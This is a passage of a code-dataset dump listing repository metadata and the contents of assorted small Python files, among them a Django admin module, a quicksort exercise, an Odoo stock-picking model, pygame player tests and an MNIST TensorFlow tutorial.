blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
118e4b1974f84443f4a7aff55f59536929fc7f86
|
9f3b478d39f1a8b706813c1b4993614a376a045d
|
/pycryptics/utils/ngrams.py
|
f5b4948ad7ec29d344d4bdd141514be91e173c58
|
[
"CC-BY-3.0",
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] |
permissive
|
kod3r/cryptics
|
a201c62bdd2ecafee5937d2d7af9c29dcd38ec67
|
4bd17d24202b6fabce8c7ad378a61e77eb7562a7
|
refs/heads/master
| 2020-12-25T16:36:25.800144
| 2013-03-09T06:12:35
| 2013-03-09T06:12:35
| 10,188,553
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 442
|
py
|
import cPickle as pickle
import os.path
INITIAL_NGRAMS = dict()
NGRAMS = dict()
i = 0
while True:
if os.path.exists('data/ngrams.%02d.pck' % i):
with open('data/initial_ngrams.%02d.pck' % i, 'rb') as f:
d = pickle.load(f)
INITIAL_NGRAMS.update(d)
with open('data/ngrams.%02d.pck' % i, 'rb') as f:
d = pickle.load(f)
NGRAMS.update(d)
i += 1
else:
break
|
[
"robin.deits@gmail.com"
] |
robin.deits@gmail.com
|
6eead2339d7beb6299ea75b3f6f188d0abada27a
|
180ed6c8ff26b365e56c63d878a69c2e9d9b8c54
|
/code/Day_04/01_xml.py
|
e218c1a1a13919328e7e183d4d19d9fc0e95e7c4
|
[] |
no_license
|
archeranimesh/python_devu_in
|
9af46503b07f82a137d4b820920fa72f96a5067b
|
3d77e9e7b150aae15375b236e3de7f573da4bdce
|
refs/heads/master
| 2020-06-08T21:22:24.329530
| 2019-07-14T11:22:55
| 2019-07-14T11:22:55
| 193,308,932
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 447
|
py
|
# Read from XML.
import xml.etree.ElementTree as ET
file_path = r"code/Day_04/data_files/data.xml"
f = ET.parse(file_path)
print("type(f): ", type(f))
# get the root.
root = f.getroot()
print("type(root): ", type(root))
print("---" * 30)
for i in root.iter():
print(i.tag)
print(i.text)
print("---" * 5)
print("---" * 30)
# iterate over a column.
print("---" * 30)
for i in root.iter("Name"):
print(i.text)
print("---" * 30)
|
[
"animeshb@archerimagine.com"
] |
animeshb@archerimagine.com
|
0d37212ad0a4f29125a824731a08f3d1111d8ae1
|
30e7173cd25d0c60bf3aecb009366c375e11411a
|
/articulos/templatetags/dict_key.py
|
a9144c06451ff0fe29b455948e58eb9ca08bbdd4
|
[] |
no_license
|
arm98sub/djangoHospital
|
55eb8ab437d1fb2036f55d9247d41fc577978e1e
|
bef771676b336d9b98f750e2e0648324cb259056
|
refs/heads/master
| 2023-05-17T14:39:54.510044
| 2021-06-01T23:36:06
| 2021-06-01T23:36:06
| 372,985,852
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 143
|
py
|
from django.template.defaultfilters import register
@register.filter(name='dict_key')
def dict_key(d,k):
return d.get(str(k)).get('cantidad')
|
[
"vagrant@ubuntu1804.localdomain"
] |
vagrant@ubuntu1804.localdomain
|
cc30e097c5a8e1be0b554cb3c5dce3428c0620e4
|
4af59c0cd941f0ebe5f0ce447a4db90914585d23
|
/tensorflow_federated/python/core/impl/compiler/local_computation_factory_base.py
|
9297be8cd44edaf0ccebc7d3d4ab82a6af1935f9
|
[
"Apache-2.0"
] |
permissive
|
ali-yaz/federated
|
bbabac58c8a5e96f95cef2b7558f61c6a8610651
|
8e3d60ae6129611b5ebf8f94755c50082d97d45a
|
refs/heads/master
| 2023-03-10T21:19:43.160733
| 2021-02-23T09:11:10
| 2021-02-23T09:11:56
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,073
|
py
|
# Copyright 2021, The TensorFlow Federated Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Defines the interface for factories of framework-specific computations."""
import abc
from tensorflow_federated.proto.v0 import computation_pb2 as pb
from tensorflow_federated.python.core.api import computation_types
class LocalComputationFactory(metaclass=abc.ABCMeta):
"""Interface for factories of backend framework-specific local computations.
Implementations of this interface encapsulate the logic for constructing local
computations that are executable on a particular type of backends (such as
TensorFlow or XLA).
"""
@abc.abstractmethod
def create_constant_from_scalar(
self, value, type_spec: computation_types.Type) -> pb.Computation:
"""Creates a TFF computation returning a constant based on a scalar value.
The returned computation has the type signature `( -> T)`, where `T` may be
either a scalar, or a nested structure made up of scalars.
Args:
value: A numpy scalar representing the value to return from the
constructed computation (or to broadcast to all parts of a nested
structure if `type_spec` is a structured type).
type_spec: A `computation_types.Type` of the constructed constant. Must be
either a tensor, or a nested structure of tensors.
Returns:
An instance of `pb.Computation` with semantics as described above.
Raises:
TypeError: if types don't match.
ValueError: if the arguments are invalid.
"""
raise NotImplementedError
|
[
"tensorflow.copybara@gmail.com"
] |
tensorflow.copybara@gmail.com
|
fbb2860ca4221244c0a63770d79e6e96dac90529
|
3603f8f76ff81ea75bfc916888bdcfa55b7f12e4
|
/alds/alds1_6_c.py
|
ac675e72489195bfa0b40dd0da0ab01f62841d94
|
[] |
no_license
|
kimotot/aizu
|
4de0319959a3b166b8c2c4940ab7b701b6ee3395
|
315be1240cff733e1c6a7cd98942a95b3bd7ec96
|
refs/heads/master
| 2021-07-24T12:37:41.935302
| 2021-03-10T09:05:05
| 2021-03-10T09:05:05
| 91,927,321
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,047
|
py
|
def decode():
n = int(input())
cards = []
for i in range(n):
[m, v] = input().split()
cards.append((m, int(v), i))
return n, cards
def partition(a, p, r):
x = a[r][1]
i = p - 1
for j in range(p, r):
if a[j][1] <= x:
i += 1
t = a[j]
a[j] = a[i]
a[i] = t
t = a[i+1]
a[i+1] = a[r]
a[r] = t
return i+1
def disp(cards):
for (m, n, _) in cards:
print("{0} {1}".format(m, n))
def quicksort(a, p, r):
if p < r:
q = partition(a, p, r)
quicksort(a, p, q-1)
quicksort(a, q+1, r)
def isstable(cards):
for i in range(len(cards) - 1):
if cards[i][1] == cards[i+1][1]:
if cards[i][2] < cards[i+1][2]:
pass
else:
return False
return True
if __name__ == '__main__':
n, cards = decode()
quicksort(cards, 0, n-1)
if isstable(cards):
print("Stable")
else:
print("Not stable")
disp(cards)
|
[
"god4bid@hear.to"
] |
god4bid@hear.to
|
5e3fbd7e68a9f9a546b5ab547039decf8d759b24
|
c50cf19707ecf44c8e15acf0e994d288fe4f01a7
|
/credit/admin.py
|
d27528df722953df4b3f2fcffcb8d2b79e4637f8
|
[
"MIT"
] |
permissive
|
JeremyParker/idlecars-backend
|
ee5981356c60161dee05c22e01e5c913e73083c0
|
819cce48e4679d61164b238b81dab0e4d51b8afa
|
refs/heads/master
| 2021-03-16T04:29:43.287760
| 2018-03-03T23:16:02
| 2018-03-03T23:16:02
| 31,734,223
| 3
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,074
|
py
|
# -*- encoding:utf-8 -*-
from __future__ import unicode_literals
from django.contrib import admin
from credit import models
class CustomerAdmin(admin.ModelAdmin):
readonly_fields = [
'user',
'invite_code',
'invitor_code',
'invitor_credited',
]
list_display = [
'user',
'invitor_code',
'invitor_credited',
'invite_code',
'app_credit',
]
search_fields = [
'user__username',
]
def username(self, instance):
return instance.user.username
class CreditCodeAdmin(admin.ModelAdmin):
list_display = [
'created_time',
'description',
'credit_code',
'credit_amount',
'invitor_credit_amount',
'redeem_count',
'expiry_time',
]
search_fields = [
'customer__user__username',
'description',
'credit_code',
]
readonly_fields = [
'redeem_count',
]
# admin.site.register(models.CreditCode, CreditCodeAdmin)
# admin.site.register(models.Customer, CustomerAdmin)
|
[
"github@jeremyparker.org"
] |
github@jeremyparker.org
|
ec81c5347f900f5b8390d51c5ec6dc1d24fd7dd3
|
b29349323954d7a7036f56cef4139ed2c8fcb4f0
|
/scripts/color_sample.py
|
cbecd9d3b9924273ebb76deaaba6cd36e6b5d975
|
[
"MIT"
] |
permissive
|
JDevlieghere/dotfiles
|
e23098fb0241367764243531804c8b9f0ef41ac5
|
09fbb4369c2e54dd38c2566a283eb05864499068
|
refs/heads/main
| 2023-09-01T02:23:14.303513
| 2023-08-23T16:36:05
| 2023-08-23T16:36:05
| 39,687,300
| 336
| 123
|
MIT
| 2020-02-24T05:32:45
| 2015-07-25T13:52:36
|
Perl
|
UTF-8
|
Python
| false
| false
| 2,707
|
py
|
#!/usr/bin/python3
"""
usage: color_sample.py [-h] [file]
Color a call tree file generated by sample
positional arguments:
file sample file
optional arguments:
-h, --help show this help message and exit
"""
import re
import argparse
import fileinput
import bisect
END_MARKER = "Total number in stack"
BEGIN_MARKER = "Call graph:"
REGEX = re.compile(r"^\D*(\d+)")
def fg(r, g, b):
"""Change foreground color."""
return "\033[38;2;{:d};{:d};{:d}m".format(r, g, b)
def reset():
"""Reset foreground color."""
return "\033[0m"
def rgb(minimum, maximum, value):
"""Convert value within range to RGB."""
assert value <= maximum
assert value >= minimum
minimum, maximum = float(minimum), float(maximum)
r = 2 * (value - minimum) / (maximum - minimum)
b = int(max(0, 255 * (1 - r)))
r = int(max(0, 255 * (r - 1)))
g = 255 - b - r
return r, g, b
def binary_find(a, x):
"""Find value in sorted list."""
i = bisect.bisect_left(a, x)
if i != len(a) and a[i] == x:
return i
return -1
def get_all_samples(lines):
"""Compute a list of all samples."""
parsing = False
samples = []
for line in lines:
if BEGIN_MARKER in line:
parsing = True
continue
if END_MARKER in line:
break
if not parsing:
continue
match = re.match(REGEX, line)
if not match:
continue
samples.append(int(match.group(1)))
return sorted(set(samples))
def color(lines, all_samples):
"""Color the call tree based on the amount of samples for each branch."""
minimum = 0
maximum = len(all_samples)
coloring = False
for line in lines:
if BEGIN_MARKER in line:
coloring = True
if END_MARKER in line:
coloring = False
if not coloring:
print(line)
continue
match = re.match(REGEX, line)
if not match:
print(line)
continue
samples = int(match.group(1))
value = binary_find(all_samples, samples)
r, g, b = rgb(minimum, maximum, value)
print(fg(r, g, b) + line + reset())
def main():
"""Color a call tree file generated by sample."""
parser = argparse.ArgumentParser(
description="Color a call tree file generated by sample"
)
parser.add_argument("file", nargs="?", help="sample file")
args = parser.parse_args()
with fileinput.input(args.file) as file:
lines = []
for line in file:
lines.append(line.rstrip())
color(lines, get_all_samples(lines))
if __name__ == "__main__":
main()
|
[
"jonas@devlieghere.com"
] |
jonas@devlieghere.com
|
ce580dc80f9d1e254df39bbd9c803c0514315380
|
ffaba5d94ea820281fee39be0841e3bf08ed157c
|
/setup.py
|
c3e69ea047bbcb8f389a65050e82f6fedcd67a85
|
[
"MIT"
] |
permissive
|
arruda/Twitter-Get-Old-Tweets-Scraper
|
d532e316ce013f94426bb9c999112c554b0f585f
|
6999a2c72df3866cb4a196370172c50b90b57e8d
|
refs/heads/master
| 2020-03-19T17:29:46.926370
| 2018-06-10T06:09:32
| 2018-06-10T06:09:32
| 136,762,748
| 1
| 1
|
MIT
| 2020-03-19T06:35:05
| 2018-06-09T22:35:46
|
Python
|
UTF-8
|
Python
| false
| false
| 1,202
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""The setup script."""
from setuptools import setup, find_packages
with open('README.md') as readme_file:
readme = readme_file.read()
requirements = [
"pyquery>=1.2.17",
"requests>=2.13.0",
]
setup_requirements = [ ]
test_requirements = [ ]
setup(
author="Felipe Arruda",
author_email='contato@arruda.blog.br',
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Intended Audience :: Developers',
'Natural Language :: English',
"Programming Language :: Python :: 2",
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
],
description="Python Boilerplate contains all the boilerplate you need to create a Python package.",
install_requires=requirements,
include_package_data=True,
name='old_tweets_crawler',
packages=find_packages(include=['old_tweets_crawler*']),
url='https://github.com/arruda/Twitter-Get-Old-Tweets-Scraper',
version='0.1.0',
zip_safe=False,
)
|
[
"felipe.arruda.pontes@gmail.com"
] |
felipe.arruda.pontes@gmail.com
|
09a6fa7f3033f4fb40be0af0bda8c23201095e4a
|
4d097d0e8c571874761463f698f5d34e38e549a0
|
/python/b_1002 터렛.py
|
dbb3151cd939c0f0d6da6eb38b86c8cf3d2fd6e3
|
[] |
no_license
|
sondongmin0419/study
|
533832151958fe8ae178d8aee183edf91ffa7e12
|
0c863e2c9111b35a15ccfaec3cc64828c584beb1
|
refs/heads/master
| 2023-03-24T11:54:04.139399
| 2021-03-15T13:40:21
| 2021-03-15T13:40:21
| 281,695,258
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 500
|
py
|
import sys
input = sys.stdin.readline
n = int(input())
for TC in range(n):
x1, y1, r1, x2, y2, r2 = map(int, input().rstrip().split())
distance = ((x2 - x1) ** 2 + (y2 - y1) ** 2) ** 0.5
if x1 == x2 and y1 == y2:
if r1 == r2:
print(-1)
else:
print(0)
elif r1 + r2 == distance or distance+min(r1,r2) == max(r1,r2):
print(1)
elif r1 + r2 < distance or distance+min(r1,r2) < max(r1,r2):
print(0)
else:
print(2)
|
[
"dongmin.dev0419@gmail.com"
] |
dongmin.dev0419@gmail.com
|
eb6166eec43fe151d8738787a51a433ff70d1972
|
5b9f7edaf22297d0d6d0239135f1b2484fd24b34
|
/module07.mysql.with.python/exercise08.py
|
9aad91a512ff126d042535a8a26bd58f3cb5c995
|
[
"MIT"
] |
permissive
|
deepcloudlabs/dcl162-2020-sep-02
|
925791b5c7adae8263e82a3c9a6a406d0b68eb0e
|
abd21c59d89985e9f5922df65fd1a5ccab019de4
|
refs/heads/master
| 2022-12-12T16:10:58.497846
| 2020-09-04T18:16:06
| 2020-09-04T18:16:06
| 291,666,203
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 389
|
py
|
import mysql.connector
my_connection = mysql.connector.connect(host="localhost", user="root", password="Secret_123", database="world")
my_cursor = my_connection.cursor()
sql = "select ctry.name, city.name from country as ctry inner join city as city on ctry.capital = city.id limit 10"
my_cursor.execute(sql)
result_set = my_cursor.fetchall()
for row in result_set:
print(row)
|
[
"deepcloudlabs@gmail.com"
] |
deepcloudlabs@gmail.com
|
8439d19170cf896f5580caa519a737b1e0e12471
|
9e988c0dfbea15cd23a3de860cb0c88c3dcdbd97
|
/sdBs/AllRun/o11_j200739+544516/sdB_O11_J200739+544516_lc.py
|
c712c7ed5a3afda832ff3ba22080131102af8479
|
[] |
no_license
|
tboudreaux/SummerSTScICode
|
73b2e5839b10c0bf733808f4316d34be91c5a3bd
|
4dd1ffbb09e0a599257d21872f9d62b5420028b0
|
refs/heads/master
| 2021-01-20T18:07:44.723496
| 2016-08-08T16:49:53
| 2016-08-08T16:49:53
| 65,221,159
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 358
|
py
|
from gPhoton.gAperture import gAperture
def main():
gAperture(band="NUV", skypos=[301.9125,54.754444], stepsz=30., csvfile="/data2/fleming/GPHOTON_OUTPU/LIGHTCURVES/sdBs/sdB_O11_J200739+544516 /sdB_O11_J200739+544516_lc.csv", maxgap=1000., overwrite=True, radius=0.00555556, annulus=[0.005972227,0.0103888972], verbose=3)
if __name__ == "__main__":
main()
|
[
"thomas@boudreauxmail.com"
] |
thomas@boudreauxmail.com
|
44a88ef6c47660f70db2f79b8fdd1d06f0611b66
|
875b9c5093efd688f79fada905bee80c42380ec1
|
/tests/test_pygame_player.py
|
20237226009ceb731a7dd5490eed46043acf0029
|
[
"MIT"
] |
permissive
|
chaheeee/PyGamePlayer
|
945e64819b3e862757e1bf9dbf622ac844f6dbed
|
430ced572eddcd638a2db5eb906e5f2016ac7250
|
refs/heads/master
| 2023-02-21T19:42:18.229341
| 2021-01-22T02:22:52
| 2021-01-22T02:22:52
| 330,974,347
| 0
| 0
|
MIT
| 2021-01-21T15:05:27
| 2021-01-19T12:35:22
|
Python
|
UTF-8
|
Python
| false
| false
| 3,064
|
py
|
import time
import pygame
from unittest import TestCase
from pygame_player import PyGamePlayer
class DummyPyGamePlayer(PyGamePlayer):
def __init__(self, force_game_fps=10, run_real_time=False):
super(DummyPyGamePlayer, self).__init__(force_game_fps=force_game_fps, run_real_time=run_real_time)
def get_keys_pressed(self, screen_array, feedback, terminal):
pass
def get_feedback(self):
return 0.0, False
class TestPyGamePlayer(TestCase):
DISPLAY_X = 1
DISPLAY_Y = 1
def setUp(self):
pygame.init()
pygame.display.set_mode((self.DISPLAY_X, self.DISPLAY_Y), 0, 32)
def tearDown(self):
pygame.quit()
def test_restores_pygame_methods_after_exit(self):
pygame_flip, pygame_update, pygame_event = pygame.display.flip, pygame.display.update, pygame.event.get
with PyGamePlayer():
# methods should be replaced
self.assertNotEqual(pygame_flip, pygame.display.flip)
self.assertNotEqual(pygame_update, pygame.display.update)
self.assertNotEqual(pygame_event, pygame.event.get)
# original methods should be restored
self.assertEqual(pygame_flip, pygame.display.flip)
self.assertEqual(pygame_update, pygame.display.update)
self.assertEqual(pygame_event, pygame.event.get)
def test_fixing_frames_per_second(self):
fix_fps_to = 3
with DummyPyGamePlayer(force_game_fps=fix_fps_to):
clock = pygame.time.Clock()
start_time_ms = clock.get_time()
for _ in range(fix_fps_to):
pygame.display.update()
end_time_ms = clock.get_time()
self.assertAlmostEqual(end_time_ms - start_time_ms, 1000.0,
msg='Expected only 1000 milliseconds to have passed on the clock after screen updates')
def test_get_keys_pressed_method_sets_event_get(self):
fixed_key_pressed = 24
class FixedKeysReturned(DummyPyGamePlayer):
def get_keys_pressed(self, screen_array, feedback, terminal):
return [fixed_key_pressed]
with FixedKeysReturned():
pygame.display.update()
key_pressed = pygame.event.get()
self.assertEqual(key_pressed[0].key, fixed_key_pressed)
def test_get_screen_buffer(self):
class TestScreenArray(DummyPyGamePlayer):
def get_keys_pressed(inner_self, screen_array, feedback, terminal):
self.assertEqual(screen_array.shape[0], self.DISPLAY_X)
self.assertEqual(screen_array.shape[1], self.DISPLAY_Y)
with TestScreenArray():
pygame.display.update()
def test_run_real_time(self):
fix_fps_to = 3
with PyGamePlayer(force_game_fps=fix_fps_to, run_real_time=True):
start = time.time()
clock = pygame.time.Clock()
for _ in range(fix_fps_to):
clock.tick(42343)
end = time.time()
self.assertAlmostEqual(end-start, 1.0, delta=0.1)
|
[
"danielslaterishere@gmail.com"
] |
danielslaterishere@gmail.com
|
5171ac07d2be35016805b504c4184d500421005d
|
045cb1a5638c3575296f83471758dc09a8065725
|
/addons/mrp_subcontracting/models/stock_picking.py
|
34f266a39dd33ebb2f957f12845bc85be08de33c
|
[] |
no_license
|
marionumza/saas
|
7236842b0db98d1a0d0c3c88df32d268509629cb
|
148dd95d991a348ebbaff9396759a7dd1fe6e101
|
refs/heads/main
| 2023-03-27T14:08:57.121601
| 2021-03-20T07:59:08
| 2021-03-20T07:59:08
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,173
|
py
|
# -*- coding: utf-8 -*-
# Part of Harpiya. See LICENSE file for full copyright and licensing details.
from datetime import timedelta
from harpiya import api, fields, models
class StockPicking(models.Model):
_inherit = 'stock.picking'
display_action_record_components = fields.Boolean(compute='_compute_display_action_record_components')
@api.depends('state')
def _compute_display_action_record_components(self):
for picking in self:
# Hide if not encoding state
if picking.state in ('draft', 'cancel', 'done'):
picking.display_action_record_components = False
continue
if not picking._is_subcontract():
picking.display_action_record_components = False
continue
# Hide if no components are track
subcontracted_productions = picking._get_subcontracted_productions()
subcontracted_moves = subcontracted_productions.mapped('move_raw_ids')
if all(subcontracted_move.has_tracking == 'none' for subcontracted_move in subcontracted_moves):
picking.display_action_record_components = False
continue
# Hide if the production is to close
if not subcontracted_productions.filtered(lambda mo: mo.state not in ('to_close', 'done')):
picking.display_action_record_components = False
continue
picking.display_action_record_components = True
# -------------------------------------------------------------------------
# Action methods
# -------------------------------------------------------------------------
def action_done(self):
res = super(StockPicking, self).action_done()
productions = self.env['mrp.production']
for picking in self:
for move in picking.move_lines:
if not move.is_subcontract:
continue
production = move.move_orig_ids.production_id
if move._has_tracked_subcontract_components():
move.move_orig_ids.filtered(lambda m: m.state not in ('done', 'cancel')).move_line_ids.unlink()
move_finished_ids = move.move_orig_ids.filtered(lambda m: m.state not in ('done', 'cancel'))
for ml in move.move_line_ids:
ml.copy({
'picking_id': False,
'production_id': move_finished_ids.production_id.id,
'move_id': move_finished_ids.id,
'qty_done': ml.qty_done,
'result_package_id': False,
'location_id': move_finished_ids.location_id.id,
'location_dest_id': move_finished_ids.location_dest_id.id,
})
else:
for move_line in move.move_line_ids:
produce = self.env['mrp.product.produce'].with_context(default_production_id=production.id).create({
'production_id': production.id,
'qty_producing': move_line.qty_done,
'product_uom_id': move_line.product_uom_id.id,
'finished_lot_id': move_line.lot_id.id,
'consumption': 'strict',
})
produce._generate_produce_lines()
produce._record_production()
productions |= production
for subcontracted_production in productions:
if subcontracted_production.state == 'progress':
subcontracted_production.post_inventory()
else:
subcontracted_production.button_mark_done()
# For concistency, set the date on production move before the date
# on picking. (Tracability report + Product Moves menu item)
minimum_date = min(picking.move_line_ids.mapped('date'))
production_moves = subcontracted_production.move_raw_ids | subcontracted_production.move_finished_ids
production_moves.write({'date': minimum_date - timedelta(seconds=1)})
production_moves.move_line_ids.write({'date': minimum_date - timedelta(seconds=1)})
return res
def action_record_components(self):
self.ensure_one()
for move in self.move_lines:
if not move._has_tracked_subcontract_components():
continue
production = move.move_orig_ids.production_id
if not production or production.state in ('done', 'to_close'):
continue
return move._action_record_components()
# -------------------------------------------------------------------------
# Subcontract helpers
# -------------------------------------------------------------------------
def _is_subcontract(self):
self.ensure_one()
return self.picking_type_id.code == 'incoming' and any(m.is_subcontract for m in self.move_lines)
def _get_subcontracted_productions(self):
self.ensure_one()
return self.move_lines.mapped('move_orig_ids.production_id')
def _get_warehouse(self, subcontract_move):
return subcontract_move.warehouse_id or self.picking_type_id.warehouse_id
def _prepare_subcontract_mo_vals(self, subcontract_move, bom):
subcontract_move.ensure_one()
group = self.env['procurement.group'].create({
'name': self.name,
'partner_id': self.partner_id.id,
})
product = subcontract_move.product_id
warehouse = self._get_warehouse(subcontract_move)
vals = {
'company_id': subcontract_move.company_id.id,
'procurement_group_id': group.id,
'product_id': product.id,
'product_uom_id': subcontract_move.product_uom.id,
'bom_id': bom.id,
'location_src_id': subcontract_move.picking_id.partner_id.with_context(force_company=subcontract_move.company_id.id).property_stock_subcontractor.id,
'location_dest_id': subcontract_move.picking_id.partner_id.with_context(force_company=subcontract_move.company_id.id).property_stock_subcontractor.id,
'product_qty': subcontract_move.product_uom_qty,
'picking_type_id': warehouse.subcontracting_type_id.id
}
return vals
def _subcontracted_produce(self, subcontract_details):
self.ensure_one()
for move, bom in subcontract_details:
mo = self.env['mrp.production'].with_context(force_company=move.company_id.id).create(self._prepare_subcontract_mo_vals(move, bom))
self.env['stock.move'].create(mo._get_moves_raw_values())
mo.action_confirm()
# Link the finished to the receipt move.
finished_move = mo.move_finished_ids.filtered(lambda m: m.product_id == move.product_id)
finished_move.write({'move_dest_ids': [(4, move.id, False)]})
mo.action_assign()
|
[
"yasir@harpiya.com"
] |
yasir@harpiya.com
|
b3b434b287cc143cda89ffc6336037d41c32a53d
|
e00bfd4ef4bc3bfd97cc26e0b6fa08eae90090a4
|
/mnist_tf_nn.py
|
67e01351550ff086596638d6ae855b0c8471c259
|
[] |
no_license
|
benjaminhuanghuang/dl-study
|
4995f99ed3776e7e01de8eef8e635ec9295a2e51
|
180f315da5c679f10b101ad0731f26bd21aa5772
|
refs/heads/master
| 2021-01-25T13:05:08.687512
| 2018-04-19T03:01:06
| 2018-04-19T03:01:06
| 123,523,798
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,069
|
py
|
'''
TensorFlow Tutorials(1)——Windows下环境搭建
https://www.youtube.com/watch?v=gItz_fBTeLM
TensorFlow系列教程(2)——手写数字的识别
https://www.youtube.com/watch?v=gx7iEa9Q-Vs
TensorFlow Tutorials(3)——FC预测自己手写的图片
https://www.youtube.com/watch?v=WKHP6QBlb8Q
'''
import os
import tensorflow as tf
import numpy as np
from tensorflow.examples.tutorials.mnist import input_data
from PIL import Image
import cv2
# Read data
# one-hot vector is a vector which is 0 in most dimensions, and 1 in a single dimension
# For example, 3 would be [0,0,0,1,0,0,0,0,0,0]
mnist = input_data.read_data_sets('./data/MNIST', one_hot=True)
x = tf.placeholder(dtype=tf.float32, shape=[None, 784], name='x')
# mnist.train.labels is a [55000, 10] array of floats
y = tf.placeholder(dtype=tf.float32, shape=[None, 10], name='y')
batch_size = 1000
def add_layer(input_data, input_num, output_num, activation_fun=None):
w = tf.Variable(initial_value=tf.random_normal(shape=[input_num, output_num]))
b = tf.Variable(initial_value=tf.random_normal(shape=[1, output_num]))
# output = input_data * weight + bias
output = tf.add(tf.matmul(input_data, w), b)
if activation_fun:
output = activation_fun(output)
return output
def build_nn(data):
hidden_layer1 = add_layer(data, 784, 100, activation_fun=tf.nn.sigmoid)
hidden_layer2 = add_layer(hidden_layer1, 100, 50, activation_fun=tf.nn.sigmoid)
output_layer = add_layer(hidden_layer2, 50, 10)
return output_layer
def train_nn(data):
# output of NN
output = build_nn(data)
# softmax used for vector compairation
loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y, logits=output))
#
optimizer = tf.train.GradientDescentOptimizer(learning_rate=1).minimize(loss)
saver = tf.train.Saver()
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
if not os.path.exists('checkpoint'):
for i in range(50):
epoch_cost = 0
for _ in range(int(mnist.train.num_examples / batch_size)):
x_data, y_data = mnist.train.next_batch(batch_size)
cost, _ = sess.run([loss, optimizer], feed_dict={x: x_data, y: y_data})
epoch_cost += cost
print('Epoch', i, ": ", epoch_cost)
accuracy = tf.reduce_mean(tf.cast(tf.equal(tf.argmax(y, 1), tf.argmax(output, 1)), tf.float32))
acc = sess.run(accuracy, feed_dict={x: mnist.test.images, y: mnist.test.labels})
print("accuracy: ", acc)
saver.save(sess, './tmp/mnist.skpt')
else:
saver.restore(sess, './tmp/mnist.skpt')
predict('./input.png', sess, output)
def reconstruct_image():
for i in range(10):
path = './imgs/{}'.format(i)
if not os.path.exists(path):
os.makedirs(path)
batch_size = 1
for i in range(int(mnist.train.num_examples / batch_size)):
x_data, y_data = mnist.train.next_batch(batch_size)
img = Image.fromarray(np.reshape(np.array(x_data[0]*255, dtype='uint8'), newshape=(28, 28)))
dir = np.argmax(y_data[0])
img.save('./imgs/{}/{}.bmp'.format(dir, i))
def read_data(path):
image = cv2.imread(path, cv2.IMREAD_GRAYSCALE)
# is square
w, h = image.shape
max_ = max(w, h)
processed_img = cv2.resize(image, dsize=(max_, max_))
processed_img = np.resize(processed_img, new_shape=(1, 784))
return image, processed_img
def predict(image_path, sess, output):
image, processed_image = read_data(image_path)
result = sess.run(output, feed_dict={x: processed_image})
result = np.argmax(result, 1)
print('The prediciton is', result)
cv2.putText(image, 'The prediction is {}'.format(result), (20, 20),
cv2.FONT_HERSHEY_COMPLEX, 1, color=(255, 255, 255))
cv2.imshow('image', image)
cv2.waitKey(0)
sv2.destroyAllWindows()
train_nn(x)
# reconstruct_image()
|
[
"bhuang@rms.com"
] |
bhuang@rms.com
|
60a7352ea9fa28baf709bc3938aeeb9ae85a08f7
|
3b84c4b7b16ccfd0154f8dcb75ddbbb6636373be
|
/google-cloud-sdk/lib/googlecloudsdk/third_party/logging_v2/gapic/config_service_v2_client_config.py
|
918b29fd0f8ebf1f3e73a5596dbf58efcd6af258
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
twistedpair/google-cloud-sdk
|
37f04872cf1ab9c9ce5ec692d2201a93679827e3
|
1f9b424c40a87b46656fc9f5e2e9c81895c7e614
|
refs/heads/master
| 2023-08-18T18:42:59.622485
| 2023-08-15T00:00:00
| 2023-08-15T12:14:05
| 116,506,777
| 58
| 24
| null | 2022-02-14T22:01:53
| 2018-01-06T18:40:35
|
Python
|
UTF-8
|
Python
| false
| false
| 3,721
|
py
|
# Copyright 2020 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
